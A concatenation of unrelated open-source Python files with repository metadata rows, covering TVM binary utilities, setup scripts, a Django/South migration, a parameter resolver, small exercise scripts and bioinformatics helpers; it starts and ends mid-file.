    data = models.JSONField(default=dict, blank=True)
    long_text = models.TextField(verbose_name='긴문장', help_text='헬프텍스트')
| 27.267606 | 80 | 0.644112 | 1,961 | 0.938278 | 0 | 0 | 0 | 0 | 0 | 0 | 412 | 0.197129 |
e2d6456c256f4a60fc99dba68620b3386e945429 | 7,033 | py | Python | python/tvm/contrib/binutil.py | uwsampl/tvm | 29a85eb8f75dbd3a338db0b28c2121ca997eb2a4 | [
"Apache-2.0"
] | 2 | 2019-12-27T04:50:01.000Z | 2021-02-04T09:54:21.000Z | python/tvm/contrib/binutil.py | uwsampl/tvm | 29a85eb8f75dbd3a338db0b28c2121ca997eb2a4 | [
"Apache-2.0"
] | null | null | null | python/tvm/contrib/binutil.py | uwsampl/tvm | 29a85eb8f75dbd3a338db0b28c2121ca997eb2a4 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Utilities for binary file manipulation"""
import os
import subprocess
from . import util
from .._ffi.base import py_str
from ..api import register_func
@register_func("tvm_callback_get_section_size")
def tvm_callback_get_section_size(binary_path, section_name):
    """Finds size of the section in the binary.

    Assumes `size` shell command exists (typically works only on Linux machines)

    Parameters
    ----------
    binary_path : str
        path of the binary file

    section_name : str
        name of section

    Return
    ------
    size : integer
        size of the section in bytes
    """
    if not os.path.isfile(binary_path):
        raise RuntimeError("no such file \"{}\"".format(binary_path))
    # We use the "-A" flag here to get the ".rodata" section's size, which is
    # not included by default.
    size_proc = subprocess.Popen(["size", "-A", binary_path], stdout=subprocess.PIPE)
    (size_output, _) = size_proc.communicate()
    if size_proc.returncode != 0:
        msg = "error in finding section size:\n"
        # Bug fix: this branch referenced an undefined name `out`, raising a
        # NameError instead of the intended RuntimeError. Report the captured
        # process output instead.
        msg += py_str(size_output)
        raise RuntimeError(msg)
    size_output = size_output.decode("utf-8")
    section_size = 0
    # Skip the first two header lines in the `size` output.
    for line in size_output.split("\n")[2:]:
        # `size -A` rows are "<name> <size> <addr>"; drop empty fields.
        tokens = list(filter(lambda s: len(s) != 0, line.split(" ")))
        if len(tokens) != 3:
            continue
        entry_name = tokens[0]
        entry_size = int(tokens[1])
        if entry_name.startswith("." + section_name):
            # The `.rodata` section should be the only section for which we
            # need to collect the size from *multiple* entries in the command
            # output.
            if section_size != 0 and not entry_name.startswith(".rodata"):
                raise RuntimeError(
                    "multiple entries in `size` output for section {}".format(section_name))
            section_size += entry_size
    return section_size
@register_func("tvm_callback_relocate_binary")
def tvm_callback_relocate_binary(binary_path, text_addr, rodata_addr, data_addr, bss_addr):
    """Relocates sections in the binary to new addresses

    Parameters
    ----------
    binary_path : str
        path of the binary file

    text_addr : str
        text section address

    rodata_addr : str
        rodata section address

    data_addr : str
        data section address

    bss_addr : str
        bss section address

    Return
    ------
    rel_bin : bytearray
        the relocated binary
    """
    temp_dir = util.tempdir()
    relocated_obj = temp_dir.relpath("relocated.o")
    # Linker script pinning each section at its requested base address.
    ld_script_contents = """
SECTIONS
{
  . = %s;
  . = ALIGN(8);
  .text :
  {
    *(.text)
    . = ALIGN(8);
    *(.text*)
  }
  . = %s;
  . = ALIGN(8);
  .rodata :
  {
    *(.rodata)
    . = ALIGN(8);
    *(.rodata*)
  }
  . = %s;
  . = ALIGN(8);
  .data :
  {
    *(.data)
    . = ALIGN(8);
    *(.data*)
  }
  . = %s;
  . = ALIGN(8);
  .bss :
  {
    *(.bss)
    . = ALIGN(8);
    *(.bss*)
  }
}
""" % (text_addr, rodata_addr, data_addr, bss_addr)
    script_path = temp_dir.relpath("relocated.lds")
    with open(script_path, "w") as script_file:
        script_file.write(ld_script_contents)
    # Run the system linker with the generated script.
    linker = subprocess.Popen(["ld", binary_path,
                               "-T", script_path,
                               "-o", relocated_obj],
                              stdout=subprocess.PIPE,
                              stderr=subprocess.STDOUT)
    (linker_output, _) = linker.communicate()
    if linker.returncode != 0:
        raise RuntimeError("linking error using ld:\n" + py_str(linker_output))
    with open(relocated_obj, "rb") as obj_file:
        return bytearray(obj_file.read())
@register_func("tvm_callback_read_binary_section")
def tvm_callback_read_binary_section(binary, section):
    """Returns the contents of the specified section in the binary byte array

    Parameters
    ----------
    binary : bytearray
        contents of the binary

    section : str
        type of section

    Return
    ------
    section_bin : bytearray
        contents of the read section
    """
    temp_dir = util.tempdir()
    input_path = temp_dir.relpath("temp.bin")
    dump_path = temp_dir.relpath("tmp_section.bin")
    # Write the binary to disk so objcopy can operate on it.
    with open(input_path, "wb") as out_file:
        out_file.write(bytes(binary))
    extractor = subprocess.Popen(["objcopy", "--dump-section",
                                  ".{}={}".format(section, dump_path),
                                  input_path],
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.STDOUT)
    (extractor_output, _) = extractor.communicate()
    if extractor.returncode != 0:
        raise RuntimeError("error in using objcopy:\n" + py_str(extractor_output))
    if not os.path.isfile(dump_path):
        # objcopy writes no dump file when the section does not exist;
        # report that as an empty byte array.
        return bytearray("", "utf-8")
    with open(dump_path, "rb") as dump_file:
        return bytearray(dump_file.read())
@register_func("tvm_callback_get_symbol_map")
def tvm_callback_get_symbol_map(binary):
    """Obtains a map of symbols to addresses in the passed binary

    Parameters
    ----------
    binary : bytearray
        contents of the binary

    Return
    ------
    map_str : str
        map of defined symbols to addresses, encoded as a series of
        alternating newline-separated keys and values
    """
    temp_dir = util.tempdir()
    obj_path = temp_dir.relpath("tmp_obj.bin")
    with open(obj_path, "wb") as out_file:
        out_file.write(bytes(binary))
    # `nm -C --defined-only` lists demangled, defined symbols only.
    nm = subprocess.Popen(["nm", "-C", "--defined-only", obj_path],
                          stdout=subprocess.PIPE,
                          stderr=subprocess.STDOUT)
    (nm_output, _) = nm.communicate()
    if nm.returncode != 0:
        raise RuntimeError("error in using nm:\n" + py_str(nm_output))
    # Each nm line is "<address> <kind> <symbol>"; emit alternating
    # "symbol\naddress\n" entries.
    entries = []
    for nm_line in nm_output.decode("utf8").splitlines():
        tokens = nm_line.split()
        entries.append("{}\n{}\n".format(tokens[2], tokens[0]))
    return "".join(entries)
| 30.055556 | 92 | 0.60273 | 0 | 0 | 0 | 0 | 6,080 | 0.864496 | 0 | 0 | 3,480 | 0.49481 |
e2dbd8f583af2e25d8d0350376cb81880e383ce4 | 25 | py | Python | src/tools/__init__.py | Talengi/phase | 60ff6f37778971ae356c5b2b20e0d174a8288bfe | [
"MIT"
] | 8 | 2016-01-29T11:53:40.000Z | 2020-03-02T22:42:02.000Z | src/tools/__init__.py | PhaseDMS/phase | 4f776d0b1b5e7916a3e26aee890b3c2b9454ef0e | [
"MIT"
] | 289 | 2015-03-23T07:42:52.000Z | 2022-03-11T23:26:10.000Z | src/tools/__init__.py | Talengi/phase | 60ff6f37778971ae356c5b2b20e0d174a8288bfe | [
"MIT"
] | 7 | 2015-12-08T09:03:20.000Z | 2020-05-11T15:36:51.000Z | """Miscellaneous tools."""
| 12.5 | 24 | 0.64 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 24 | 0.96 |
e2dbe9c76ca624c9fbd50f0a72f93f20df4c9250 | 831 | py | Python | setup.py | myslak71/dmt | fcf892391656c02118733db6680d9e4e33b59495 | [
"MIT"
] | 1 | 2019-01-30T14:05:25.000Z | 2019-01-30T14:05:25.000Z | setup.py | myslak71/dmt | fcf892391656c02118733db6680d9e4e33b59495 | [
"MIT"
] | null | null | null | setup.py | myslak71/dmt | fcf892391656c02118733db6680d9e4e33b59495 | [
"MIT"
] | null | null | null | import os
from setuptools import setup, find_packages
DIR_PATH = os.path.dirname(os.path.abspath(__file__))

# The PyPI long description comes straight from the README.
with open(os.path.join(DIR_PATH, 'README.md')) as file:
    long_description = file.read()

# Read pinned requirements inside a context manager so the file handle is
# closed; the original `open()` inside the comprehension leaked it.
with open(os.path.join(DIR_PATH, 'requirements.txt')) as req_file:
    install_requires = [line.rstrip('\n') for line in req_file]

setup(
    name='dmt',
    version='0.1.10',
    packages=find_packages(),
    author='kedod',
    author_email='kedod@protonmail.com',
    description='Log time from toggl entries to Jira smoothly.',
    url='https://github.com/kedod/dmt',
    download_url='https://github.com/kedod/dmt/archive/v0.1.10.tar.gz',
    keywords=['toggl', 'jira', 'logger', 'logging'],
    long_description=long_description,
    include_package_data=True,
    install_requires=install_requires,
    package_data={
        '': ['*.yaml']
    }
)
| 28.655172 | 99 | 0.683514 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 245 | 0.294826 |
e2dd7fd24d1c7212ab9397da79dd030d977de222 | 159 | py | Python | card_dispenser_test.py | Denexapp/mannequin | 400918ac77baa8c2a9b93d96ae12a5d5955275bc | [
"MIT"
] | null | null | null | card_dispenser_test.py | Denexapp/mannequin | 400918ac77baa8c2a9b93d96ae12a5d5955275bc | [
"MIT"
] | null | null | null | card_dispenser_test.py | Denexapp/mannequin | 400918ac77baa8c2a9b93d96ae12a5d5955275bc | [
"MIT"
] | null | null | null | import card_dispenser
import time
# Manual hardware smoke test: construct the dispenser driver and keep
# ejecting one card per cycle until interrupted.
card_dispenser_object = card_dispenser.card_dispenser()
while True:
    # Trigger a single card ejection on the device.
    card_dispenser_object.give_card()
time.sleep(10) | 22.714286 | 55 | 0.811321 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
e2ddbc96cd11bd3a0665665c3f5416de81dbb4d5 | 4,062 | py | Python | brewtils/resolvers/manager.py | scott-taubman/brewtils | 3478e5ebd6383d7724286c9d0c7afac9ef5d7b45 | [
"MIT"
] | null | null | null | brewtils/resolvers/manager.py | scott-taubman/brewtils | 3478e5ebd6383d7724286c9d0c7afac9ef5d7b45 | [
"MIT"
] | null | null | null | brewtils/resolvers/manager.py | scott-taubman/brewtils | 3478e5ebd6383d7724286c9d0c7afac9ef5d7b45 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import logging
from typing import Any, Dict, List, Mapping
try:
from collections import Mapping as CollectionsMapping
except ImportError:
from collections.abc import Mapping as CollectionsMapping
from brewtils.models import Parameter, Resolvable
from brewtils.resolvers.bytes import BytesResolver
from brewtils.resolvers.chunks import ChunksResolver
from brewtils.resolvers.identity import IdentityResolver
from brewtils.schema_parser import SchemaParser
def build_resolver_map(easy_client=None):
    """Builds all resolvers.

    Args:
        easy_client: client passed through to resolvers that talk to the API.

    Returns:
        Ordered list of resolver instances; order matters because the first
        resolver whose should_upload/should_download matches wins.
    """
    return [
        IdentityResolver(), # This should always be first
        BytesResolver(easy_client),
        ChunksResolver(easy_client),
    ]
class ResolutionManager(object):
    """Parameter resolution manager

    This class is used under-the-hood for various plugin functions. Its purpose is to
    remove all the various cleanup and housekeeping steps involved in resolving
    parameters. An example of an unresolved parameter is a dictionary which represents a
    bytes object. In this case the user wants the open file descriptor, not the random
    dictionary that they don't know how to process. The parameter resolver helps handle
    these scenarios.

    This is intended for internal use for the plugin class.
    """
    def __init__(self, **kwargs):
        self.logger = logging.getLogger(__name__)
        # kwargs (e.g. easy_client) are forwarded to resolver construction;
        # resolver order in this list determines matching priority.
        self.resolvers = build_resolver_map(**kwargs)
    def resolve(self, values, definitions=None, upload=True):
        # type: (Mapping[str, Any], List[Parameter], bool) -> Dict[str, Any]
        """Iterate through parameters, resolving as necessary

        Args:
            values: Dictionary of request parameter values
            definitions: Parameter definitions
            upload: Controls which methods will be called on resolvers

        Returns:
            The resolved parameter dict
        """
        resolved_parameters = {}
        for key, value in values.items():
            # First find the matching Parameter definition, if possible.
            # Falls back to an empty Parameter() when no definition matches.
            definition = Parameter()
            for param_def in definitions or []:
                if param_def.key == key:
                    definition = param_def
                    break
            # Check to see if this is a nested parameter: recurse with the
            # nested definitions.
            if isinstance(value, CollectionsMapping) and definition.parameters:
                resolved = self.resolve(
                    value, definitions=definition.parameters, upload=upload
                )
            # See if this is a multi parameter
            elif isinstance(value, list):
                # This is kind of gross because multi-parameters are kind of gross
                # We have to wrap everything into the correct form and pull it out
                resolved = []
                for item in value:
                    resolved_item = self.resolve(
                        {key: item}, definitions=definitions, upload=upload
                    )
                    resolved.append(resolved_item[key])
            # This is a simple parameter
            else:
                # See if this is a parameter that needs to be resolved; the
                # first resolver that claims the value wins.
                for resolver in self.resolvers:
                    if upload and resolver.should_upload(value, definition):
                        resolvable = resolver.upload(value, definition)
                        resolved = SchemaParser.serialize(resolvable, to_string=False)
                        break
                    elif (
                        not upload
                        and resolver.should_download(value, definition)
                        and isinstance(value, Mapping)
                    ):
                        resolvable = Resolvable(**value)
                        resolved = resolver.download(resolvable, definition)
                        break
                # Just a normal parameter (for/else: no resolver matched).
                else:
                    resolved = value
            resolved_parameters[key] = resolved
        return resolved_parameters
| 37.266055 | 88 | 0.609306 | 3,342 | 0.822747 | 0 | 0 | 0 | 0 | 0 | 0 | 1,389 | 0.34195 |
e2de0a9341a0679887e57b9901b796e25b230e85 | 327 | py | Python | python_exercises/Curso_em_video/ex011.py | Matheus-IT/lang-python-related | dd2e5d9b9f16d3838ba1670fdfcba1fa3fe305e9 | [
"MIT"
] | null | null | null | python_exercises/Curso_em_video/ex011.py | Matheus-IT/lang-python-related | dd2e5d9b9f16d3838ba1670fdfcba1fa3fe305e9 | [
"MIT"
] | null | null | null | python_exercises/Curso_em_video/ex011.py | Matheus-IT/lang-python-related | dd2e5d9b9f16d3838ba1670fdfcba1fa3fe305e9 | [
"MIT"
] | null | null | null | b = float(input('\033[36mQual a largura da parede? \033[m'))
# Paint-coverage exercise: read the wall height (width `b` was read above),
# compute the area and estimate paint needed at 2 m² per litre.
h = float(input('\033[32mQual a altura da parede? \033[m'))
a = b * h
print(f'\033[36mSua parede tem dimensão {b} x {h} e sua área é de {a:.3f}m².\033[m')
print(f'\033[32mPara pintar essa parede, você precisará de {a / 2}L de tinta.\033[m')
| 54.5 | 97 | 0.642202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 234 | 0.702703 |
e2e02ccb6ac1cca4a93470eb0dd9419960f28e58 | 1,062 | py | Python | labs/tony-monday-10-jg113/exam_marks_4.py | TonyJenkins/lbu-python-code | d02d843290e887d016cdb05ddc1a8639874f2e06 | [
"Unlicense"
] | 2 | 2021-08-20T13:02:45.000Z | 2021-10-03T20:34:45.000Z | labs/tony-monday-10-jg113/exam_marks_4.py | TonyJenkins/lbu-python-code | d02d843290e887d016cdb05ddc1a8639874f2e06 | [
"Unlicense"
] | null | null | null | labs/tony-monday-10-jg113/exam_marks_4.py | TonyJenkins/lbu-python-code | d02d843290e887d016cdb05ddc1a8639874f2e06 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
# How many exam marks the program collects in one run.
NUMBER_OF_MARKS = 5
def avg(numbers):
    """Return the arithmetic mean of a non-empty sequence of numbers."""
    total = sum(numbers)
    return total / len(numbers)
def valid_mark(mark):
    """Return True when the mark lies in the inclusive 0..100 range."""
    return mark >= 0 and mark <= 100
def read_marks(number_of_marks):
    """Prompt for *number_of_marks* marks, re-asking until each is in range."""
    collected = []
    for count in range(number_of_marks):
        mark = int(input(f'Enter mark #{count + 1}: '))
        # Keep re-prompting (after an error message) until the mark is valid.
        while not valid_mark(mark):
            print('Mark out of range. Try again.')
            mark = int(input(f'Enter mark #{count + 1}: '))
        collected.append(mark)
    return collected
def letter_grade(mark):
    """Map a numeric mark to a letter grade (thresholds are exclusive)."""
    for threshold, grade in ((70, 'A'), (60, 'B'), (50, 'C'), (40, 'D')):
        if mark > threshold:
            return grade
    return 'F'
def print_results(marks):
    """Print a summary (max, min, average, letter grade) of the marks."""
    average = avg(marks)
    print()
    print(f'Maximum Mark: {max(marks)}')
    print(f'Minimum Mark: {min(marks)}')
    print(f'Average Mark: {average:.2f}')
    print()
    print(f'Grade: {letter_grade(average)}')
if __name__ == '__main__':
    # Entry point: collect the marks interactively, then show the summary.
    mark_list = read_marks(NUMBER_OF_MARKS)
    print_results(mark_list)
| 19.309091 | 60 | 0.568738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 241 | 0.22693 |
e2e151be842d9c1c84c0a1b32ad5def096f0dfda | 8,668 | py | Python | account/migrations/0004_auto__add_field_userprofile_sjtu_id__add_field_userprofile_sjtu_initpa.py | liweitianux/django-skaschool | 2ff96ef814d1c0e4dc3464418290236797bae038 | [
"BSD-2-Clause"
] | 1 | 2018-04-09T15:45:05.000Z | 2018-04-09T15:45:05.000Z | account/migrations/0004_auto__add_field_userprofile_sjtu_id__add_field_userprofile_sjtu_initpa.py | liweitianux/django-skaschool | 2ff96ef814d1c0e4dc3464418290236797bae038 | [
"BSD-2-Clause"
] | null | null | null | account/migrations/0004_auto__add_field_userprofile_sjtu_id__add_field_userprofile_sjtu_initpa.py | liweitianux/django-skaschool | 2ff96ef814d1c0e4dc3464418290236797bae038 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        # Auto-generated South schema migration (forward direction):
        # adds two CharField columns to the account_userprofile table.
        # Adding field 'UserProfile.sjtu_id'
        db.add_column(u'account_userprofile', 'sjtu_id',
                      self.gf('django.db.models.fields.CharField')(default='', max_length=15, blank=True),
                      keep_default=False)
        # Adding field 'UserProfile.sjtu_initpass'
        db.add_column(u'account_userprofile', 'sjtu_initpass',
                      self.gf('django.db.models.fields.CharField')(default='', max_length=10, blank=True),
                      keep_default=False)
    def backwards(self, orm):
        # Auto-generated South schema migration (reverse direction):
        # drops the columns added by forwards().
        # Deleting field 'UserProfile.sjtu_id'
        db.delete_column(u'account_userprofile', 'sjtu_id')
        # Deleting field 'UserProfile.sjtu_initpass'
        db.delete_column(u'account_userprofile', 'sjtu_initpass')
models = {
u'account.userfile': {
'Meta': {'ordering': "['user', 'id']", 'object_name': 'UserFile'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'file': ('account.extra.ContentTypeRestrictedFileField', [], {'content_types': "['application/gzip', 'application/msword', 'application/pdf', 'application/postscript', 'application/rar', 'application/vnd.ms-excel', 'application/vnd.oasis.opendocument.spreadsheet', 'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.presentation', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'application/wps-office.doc', 'application/wps-office.dps', 'application/wps-office.et', 'application/wps-office.ppt', 'application/wps-office.pptx', 'application/wps-office.wps', 'application/wps-office.xls', 'application/zip', 'application/x-7z-compressed', 'application/x-bzip2', 'application/x-dvi', 'application/x-latex', 'application/x-rar-compressed', 'application/x-tar', 'image/bmp', 'image/gif', 'image/jpeg', 'image/png', 'image/tiff', 'text/csv', 'text/plain', 'text/rtf', 'text/x-markdown', 'text/x-tex']", 'max_upload_size': '10485760', 'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'account.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identity': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'institute': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'is_approved': ('django.db.models.fields.CharField', [], {'default': "'C'", 'max_length': '1'}),
'is_checkin': ('django.db.models.fields.CharField', [], {'default': "'X'", 'max_length': '1'}),
'is_sponsored': ('django.db.models.fields.CharField', [], {'default': "'C'", 'max_length': '1'}),
'realname': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'reason': ('django.db.models.fields.TextField', [], {}),
'sjtu_id': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'}),
'sjtu_initpass': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
'supplement': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'transcript': ('account.extra.ContentTypeRestrictedFileField', [], {'content_types': "['application/gzip', 'application/msword', 'application/pdf', 'application/postscript', 'application/rar', 'application/vnd.ms-excel', 'application/vnd.oasis.opendocument.spreadsheet', 'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.presentation', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'application/wps-office.doc', 'application/wps-office.dps', 'application/wps-office.et', 'application/wps-office.ppt', 'application/wps-office.pptx', 'application/wps-office.wps', 'application/wps-office.xls', 'application/zip', 'application/x-7z-compressed', 'application/x-bzip2', 'application/x-dvi', 'application/x-latex', 'application/x-rar-compressed', 'application/x-tar', 'image/bmp', 'image/gif', 'image/jpeg', 'image/png', 'image/tiff', 'text/csv', 'text/plain', 'text/rtf', 'text/x-markdown', 'text/x-tex']", 'max_upload_size': '10485760', 'null': 'True', 'max_length': '100', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'unique': 'True'})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['account'] | 90.291667 | 1,204 | 0.62102 | 8,501 | 0.980734 | 0 | 0 | 0 | 0 | 0 | 0 | 6,369 | 0.734772 |
e2e18396a6d1962265c20433bef9b5473eadd7dd | 1,689 | py | Python | tests/mp.py | dmxj/icv | 0b074ec9475f2c70038d2e8b7166414fd5b93e61 | [
"MIT"
] | 5 | 2019-09-10T04:02:19.000Z | 2020-07-24T07:46:08.000Z | tests/mp.py | dmxj/icv | 0b074ec9475f2c70038d2e8b7166414fd5b93e61 | [
"MIT"
] | null | null | null | tests/mp.py | dmxj/icv | 0b074ec9475f2c70038d2e8b7166414fd5b93e61 | [
"MIT"
] | 1 | 2020-03-20T03:44:04.000Z | 2020-03-20T03:44:04.000Z | from multiprocessing import Pool, Queue
import multiprocessing
import threading
import time
def test(x):
    # Worker for the multiprocessing experiments below: unpack a 3-tuple,
    # simulate slow work, and return (sum, product) of the elements.
    x0,x1,x2 = x
    time.sleep(2)
    return x0+x1+x2, x0*x1*x2
    # Dead code left from an earlier experiment (unreachable after return):
    # if p==10000:
    #     return True
    #     else:
    #         return False
class Dog():
    # Minimal fixture class for trying Pool.apply_async with a bound method.
    def __init__(self):
        pass
    def go(self,name):
        # Return a simple greeting; used as the target callable in the
        # commented-out multiprocessing experiments in __main__ below.
        return "hello %s" % name
def tt(n):
    # Scratch function: rebinds its local parameter only; this has no
    # effect on the caller and the function always returns None.
    n = "rensike"
    return
if __name__ == "__main__":
    # Commented-out experiment 1: thread pool_th feeds a Pool while
    # result_th drains the queue and terminates the pool on success.
    # result=Queue() # queue of AsyncResult handles
    # pool = Pool()
    # def pool_th():
    #     for i in range(50000000): ## a very large number of child tasks is created here
    #         try:
    #             result.put(pool.apply_async(test, args=(i,)))
    #         except:
    #             break
    # def result_th():
    #     while 1:
    #         a=result.get().get() # fetch the child task's return value
    #         if a:
    #             pool.terminate() # terminate all child processes
    #             break
    # '''
    # Use two threads running concurrently: one drives Pool to spawn child
    # tasks, the other collects the child tasks' return values.
    # '''
    # t1=threading.Thread(target=pool_th)
    # t2=threading.Thread(target=result_th)
    # t1.start()
    # t2.start()
    # t1.join()
    # t2.join()
    # pool.join()
    # Commented-out experiment 2: single-process Pool.map over one tuple.
    # p = multiprocessing.Pool(1)
    # rslt = p.map(test, ((3,6,9),))
    # print(rslt[0])
    from multiprocessing import Pool
    # Commented-out experiment 3: apply_async with a plain function.
    # import numpy as np
    #
    # def foo(a):
    #     return "hello {}".format(a)
    #
    # p = Pool()
    # result = p.apply_async(foo, args=(np.random.random((2,3)),))
    # # foo and a are the target function and argument; repeat this line to
    # # run several processes and collect different results
    # p.close()
    # p.join()
    #
    # r = result.get()
    #
    # print(r)
    # Commented-out experiment 4: apply_async with a bound method (Dog.go).
    # p = Pool()
    # d = Dog()
    # result = p.apply_async(d.go,args=("sikeppp",))
    #
    # p.close()
    # p.join()
    #
    # r = result.get()
    # print(r)
| 20.597561 | 66 | 0.503848 | 106 | 0.056114 | 0 | 0 | 0 | 0 | 0 | 0 | 1,259 | 0.66649 |
e2e2636a936283d6012ec94041d4e569e1a7ef83 | 893 | py | Python | dudes/Util.py | rababerladuseladim/dudes | aed526df8295210e82e89fef9c9bb45daae3be3e | [
"MIT"
] | 7 | 2018-01-03T12:52:28.000Z | 2022-02-15T02:49:15.000Z | dudes/Util.py | pirovc/dudes | aed526df8295210e82e89fef9c9bb45daae3be3e | [
"MIT"
] | 1 | 2019-05-01T14:54:23.000Z | 2022-02-14T12:06:20.000Z | dudes/Util.py | rababerladuseladim/dudes | aed526df8295210e82e89fef9c9bb45daae3be3e | [
"MIT"
] | 2 | 2019-05-08T19:26:21.000Z | 2021-04-15T10:20:01.000Z | from dudes.Ranks import Ranks
import numpy as np
import sys
def printDebug(DEBUG, l):
    """Write *l* (stringified, newline-terminated) to stderr when DEBUG is truthy."""
    if not DEBUG:
        return
    sys.stderr.write("{}\n".format(l))
def group_max(groups, data, pre_order=None):
    """Locate the per-group maximum of ``data`` grouped by ``groups``.

    Sorts primarily by group id and secondarily by value, so the largest
    element of each group ends up last within its group; those positions
    are then flagged in a boolean marker array.

    Parameters
    ----------
    groups : np.ndarray
        Group id for each element of ``data``.
    data : np.ndarray
        Values to maximise within each group.
    pre_order : np.ndarray, optional
        A sort order computed by a previous call; when given, only the
        marker array is returned.

    Returns
    -------
    ``(order, index)`` when ``pre_order`` is None, otherwise just ``index``.
    ``index`` is aligned with the sorted order: ``data[order][index]``
    yields the group maxima in ``np.unique(groups)`` order.
    """
    if pre_order is None:
        # Sort by group first, value second -> group maxima come last.
        order = np.lexsort((data, groups))
    else:
        order = pre_order
    groups = groups[order] #this is only needed if groups is unsorted
    # (Removed a dead `data = data[order]` assignment: the sorted copy of
    # `data` was never used after being created.)
    index = np.empty(len(groups), 'bool')
    index[-1] = True
    # True wherever the next element starts a new group, i.e. at the last
    # (maximal) element of each group.
    index[:-1] = groups[1:] != groups[:-1]
    if pre_order is None:
        return order, index
    else:
        return index # Return the data array in an ordered way (matching the output of np.unique(groups))
def getNameRank(rankid):
    """Return the fixed rank name for *rankid*; out-of-range ids map to the last rank."""
    if rankid >= len(Ranks.ranks):
        return Ranks.ranks[-1] # more than one no_rank/strain
    return Ranks.ranks[rankid]
def getIndexRank(rank):
# Returns the fixed ranks based on rankid
